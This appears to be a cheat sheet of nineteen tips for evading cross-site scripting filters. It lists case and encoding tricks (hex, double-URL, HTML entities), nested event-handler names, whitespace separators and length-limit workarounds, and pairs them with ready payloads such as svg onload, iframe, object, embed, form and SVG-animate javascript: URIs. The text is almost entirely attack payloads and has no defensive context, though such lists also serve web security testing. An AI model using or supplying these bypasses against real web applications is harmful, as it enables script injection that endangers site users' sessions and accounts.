Tip 1 uppercase :
onerror ==> block
ONERROR ==> allow

Tip 2 mix uppercase with lowercase:
onerror ==> block
OnErROr ==> allow

Tip 3 encode hex:
onerror ==> block
ONerror ==> block
ON%65rror ==> allow

Tip 4 double encode hex:
onerror ==> block
ONerror ==> block
ON%65rror ==> block
ON%2565rror ==> allow

Tip 5 encode html:
onerror ==> block
ONerror ==> block
ON%65rror ==> block
ON%2565rror ==> block
&#79;nerror ==> allow

Tip 6 encode hex + encode html
onerror ==> block
ONerror ==> block
ON%65rror ==> block
ON%2565rror ==> block
&#79;nerror ==> block
%26%2379%3Bnerror ==> allow

Tip 7 bypass black list:
onerror ==> block.
onload ==> block.
...
...
onauxclick ==> allow.

Tip 8 delete eventhandler:
onerror ==> delete
oneonerrorrror ==> onerror ==> allow

Tip 9 add string:
onerror ==> ononerror
error ==> onerror ==> bypass

Tip 10 delete tag:
onerror ==> block
<script> ==> delete
one<script>rror ==> allow

Tip 11 bypass between tag <>:
<img src=1 onerror=alert(4)> ==> block onerror.
<img src=x onerror=alert(4)%0a ==>
allow
OR
<svg onload=alert(4)
You can change %0a to %09,%0c,%0d,//

Tip 12 bypass space:
<...... onerror=alert(4)> block
<......%0aonerror=alert(4)> allow

Tip 13 bypass length 1:
onxxx==>block (length >=5)
onxx==> allow (length <5)
<iframe src=javascript:alert(4)> allow
  
Tip 14 bypass length 2:
onxxx==>block (length >=5)
onxx==> allow (length <5)
<script/**b4walid**/>alert(4)</script> allow

Tip 15 bypass length 3:
onxxx==>block (length >=5)
onxx==> allow (length <5)
<object data=javascript:alert(4)> allow
  
Tip 16 bypass length 4:
onxxx==>block (length >=5)
onxx==> allow (length <5)
<embed src=javascript:alert(4)> allow
  
Tip 17 bypass length 5:
onxxx==>block (length >=5)
onxx==> allow (length <5)
<a href=javascript:alert(4)>click</a> allow
  
Tip 18 bypass length 6:
onxxx==>block (length >=5)
onxx==> allow (length <5)
block all precedent tips.
<form action=javascript:alert(0)><input type=submit> allow
  
Tip 19 bypass length 8:
onxxx==>block (length >=5)
onxx==> allow (length <5)
block all precedent tips.
<svg><a/4><text/y=44>click</text><animate/attributeName=href from=javascript:alert(4) to> allow
